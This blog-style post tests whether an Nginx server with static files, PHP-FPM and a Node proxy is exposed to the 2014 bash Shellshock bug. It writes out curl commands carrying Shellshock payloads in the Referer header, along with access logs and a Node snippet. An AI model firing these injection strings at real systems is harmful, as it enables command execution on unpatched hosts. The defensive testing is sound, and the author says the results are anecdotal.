Cases Where Bash Shellshock Does Not Apply

You saw the CVE, freaked out, updated the packages, and now you're wondering if you were vulnerable.

While DHCP and other pieces are reportedly vulnerable, the major focus has been on HTTP and other web-accessible endpoints.

In my case, I was running the following stack:

  • Nginx -> static files
  • Nginx -> PHP-FPM
  • Nginx -> proxy_pass -> Node applications

The test server was running CentOS, had vulnerable bash, and /bin/sh was symlinked to bash.

From what I can tell, Nginx does not explicitly pass environment variables through a shell.

The following cases appeared to be safe:

Static Nginx serving

curl --referer "() { :; }; ping 127.0.0.1" http://192.168.33.33/assets/page.js
curl --referer "() { :; }; echo test > /tmp/test" http://192.168.33.33/assets/page.js


192.168.33.1 - - [25/Sep/2014:13:44:47 +0000] "GET /assets/page.js HTTP/1.1" 200 17541 "() { :; }; ping 127.0.0.1" "curl/7.30.0"
192.168.33.1 - - [25/Sep/2014:13:45:23 +0000] "GET /assets/page.js HTTP/1.1" 200 17541 "() { :; }; echo test > /tmp/test" "curl/7.30.0"

Neither ping ran nor was test written.

Nginx to PHP-FPM through FastCGI


curl --referer "() { :; }; ping 127.0.0.1" http://192.168.33.33/login
curl --referer "() { :; }; echo test > /tmp/test" http://192.168.33.33/login

192.168.33.1 - - [25/Sep/2014:13:31:51 +0000] "GET /login HTTP/1.1" 200 3211 "() { :; }; echo test > /tmp/test" "curl/7.30.0"
192.168.33.1 - - [25/Sep/2014:13:33:14 +0000] "GET /login HTTP/1.1" 200 3211 "() { :; }; ping 127.0.0.1" "curl/7.30.0"

Again, neither ping ran nor was test written.

Nginx through Node.js app that runs a shell


curl --referer "() { :; }; ping 127.0.0.1" http://192.168.33.33/node

var http = require("http");
var exec = require('child_process').exec;

http.createServer(function(req, rep) {

        exec("echo hi", function(err, stdout, stderr) {
        rep.end(stdout);
});
}).listen(9090);

192.168.33.1 - - [25/Sep/2014:13:55:21 +0000] "GET /node HTTP/1.1" 200 14 "() { :; }; ping 127.0.0.1" "curl/7.30.0"

Again, nothing.

I would thus like to conclude that passing data through Nginx using FastCGI or proxy_pass does not require a shell, and therefore no public endpoints on my server were affected from what I know.

Also, some initial reports state the OpenSSH was vulnerable. In general, it appears that users would need a successful login shell to exploit this in the first place.

This is all anecdotal, and I'd like to see if anyone else can replicate these results.